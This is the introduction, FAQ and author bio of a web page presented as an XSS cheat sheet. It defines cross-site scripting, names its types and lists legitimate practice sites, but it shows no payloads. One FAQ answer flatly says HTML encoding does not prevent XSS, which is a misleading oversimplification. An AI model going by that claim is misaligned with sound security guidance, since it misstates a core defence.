In this XSS cheat sheet, we discussed various commands related to the XSS (Cross-Site Scripting) that you can refer to instantly when needed. XSS allows malicious scripts into the websites in order to carry out some operation. This cross-site scripting cheat sheet acts as a quick reference for you whenever you need XSS commands. 

Interested in learning more about injections and cyber attacks? Check Out Our SQL Injection Cheat Sheet.

Frequently Asked Questions

1. What is an XSS Cheat Sheet?

The XSS cheat sheet consists of various XSS vectors that help you bypass WAFs and filters.

2. What is an XSS Attack (with example)?

XSS or cross-site scripting attack is when hackers run malicious JavaScript code in a victim’s browser. A typical example of an XSS attack is when a hacker stores malicious script in the data sent from a website’s search form.

3. What are the Three Types of XSS?

The three types of XSS attacks are: 

  • Reflected XSS
  • Store XSS
  • DOM Based XSS

4. Where Can I Practice XSS?

There are a plethora of vulnerable websites available where you can practice XSS. These vulnerable websites are as follows: 

  • Google XSS Game
  • alert(1) to win
  • prompt(1) to win
  • XSS Challenges by yamagata21
  • XSS Challenges by nopernik
  • XSS Polyglot Challenge
  • Vulnweb by Acunetix
  • OWASP WebGoat Project

5. Does HTML Encoding Prevent XSS?

No, HTML encoding does not prevent XSS or cover all types of XSS attacks.

6. Which is the Most Common Type of XSS Attack?

The most common type of XSS attack is the Reflected or Non-persistent attack.

By Sameeksha Medewar

Sameeksha is a freelance content writer for more than half and a year. She has a hunger to explore and learn new things. She possesses a bachelor's degree in Computer Science.

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